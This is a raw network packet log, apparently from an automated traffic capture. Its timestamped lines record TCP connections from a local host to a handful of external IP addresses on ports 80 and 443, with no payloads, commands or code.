                                                                                    Sep 27, 2024 00:15:14.348382950 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.348691940 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348706007 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348722935 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348740101 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348748922 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.348757029 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348773003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348788977 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348795891 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.348826885 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349072933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349087954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349138021 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349222898 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349237919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349253893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349267960 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349267960 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349287987 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349298000 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349302053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349318027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349324942 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349334002 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349349022 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349364042 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349394083 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349756956 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349771976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349786997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349801064 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349817991 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349831104 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349833012 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349853039 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349853992 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349868059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.349872112 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.349910975 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350081921 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350097895 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350112915 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350128889 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350172997 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350199938 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350207090 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350218058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350234032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350248098 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350255966 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350282907 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350333929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350426912 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350442886 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350456953 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350472927 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350485086 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350487947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350505114 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350512981 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350521088 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.350528955 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.350567102 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351028919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351044893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351059914 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351077080 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351083040 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351093054 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351109028 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351125002 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351131916 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351141930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351155043 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351159096 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351176023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351191998 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351193905 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351210117 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351224899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351243019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.351244926 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351244926 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.351283073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.390037060 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:14.390063047 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.390074968 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:14.390083075 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.393820047 CEST443497755.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.393903017 CEST443497755.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.393949032 CEST49775443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:14.393964052 CEST49775443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:14.397289038 CEST49775443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:14.397313118 CEST443497755.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431050062 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431111097 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431127071 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431179047 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431185961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431204081 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431258917 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431365967 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431380987 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431427002 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431430101 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431443930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431459904 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431488991 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431512117 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431684971 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431700945 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431716919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431731939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431747913 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431762934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.431766033 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431790113 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431806087 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.431972980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432133913 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432149887 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432166100 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432178020 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.432182074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432199955 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432208061 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.432218075 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432234049 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432244062 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.432250023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432265997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432271004 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.432284117 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432300091 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432303905 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.432317019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432348967 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.432861090 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.432905912 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.433085918 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433100939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433115959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433130980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433136940 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.433146954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433171034 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.433187962 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433203936 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433219910 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433231115 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.433234930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433249950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433260918 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.433265924 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433283091 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433289051 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.433299065 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433932066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.433975935 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.435204983 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435220003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435235023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435267925 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435281992 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435287952 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.435297012 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435312986 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435316086 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.435339928 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.435516119 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435564995 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.435601950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435616970 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435631990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435650110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435662985 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.435667038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.435719013 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436055899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436070919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436089039 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436101913 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436111927 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436116934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436132908 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436132908 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436150074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436157942 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436166048 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436183929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436187029 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436198950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436216116 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436232090 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436256886 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436449051 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436549902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436640978 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436656952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436681032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436697960 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436712980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436727047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.436731100 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.436772108 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437138081 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437155008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437169075 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437185049 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437199116 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437202930 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437222004 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437222958 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437237978 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437239885 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437253952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437269926 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437278986 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437285900 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437303066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437309027 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437319994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437346935 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437501907 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.437545061 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437675953 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437691927 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437797070 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.437835932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437850952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437865019 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437865973 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437884092 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437889099 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437900066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437915087 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437916040 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437932014 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.437937975 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.437968016 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.438251019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438263893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438312054 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438314915 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.438328028 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438343048 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438366890 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.438373089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438375950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438381910 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438390017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438416004 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.438781023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438796997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438811064 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438827991 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438843966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438858986 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.438868999 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.438901901 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.439105988 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439120054 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439133883 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439150095 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439163923 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439178944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439184904 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.439197063 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439213991 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.439239979 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.439239979 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.441345930 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.441368103 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.492785931 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.519948959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.519963026 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.519974947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520030975 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520076036 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520241976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520253897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520266056 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520277977 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520282984 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520289898 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520303011 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520312071 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520313978 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520330906 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520347118 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520570040 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520581961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520592928 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520603895 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520606995 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520617008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.520627975 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.520654917 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.521080017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521092892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521105051 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521116972 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521128893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521138906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521151066 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.521171093 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.521193027 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.521203995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521384954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521397114 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521413088 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521425009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521435976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521446943 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521455050 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.521462917 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.521486998 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.521505117 CEST4977480192.168.2.4147.45.44.104
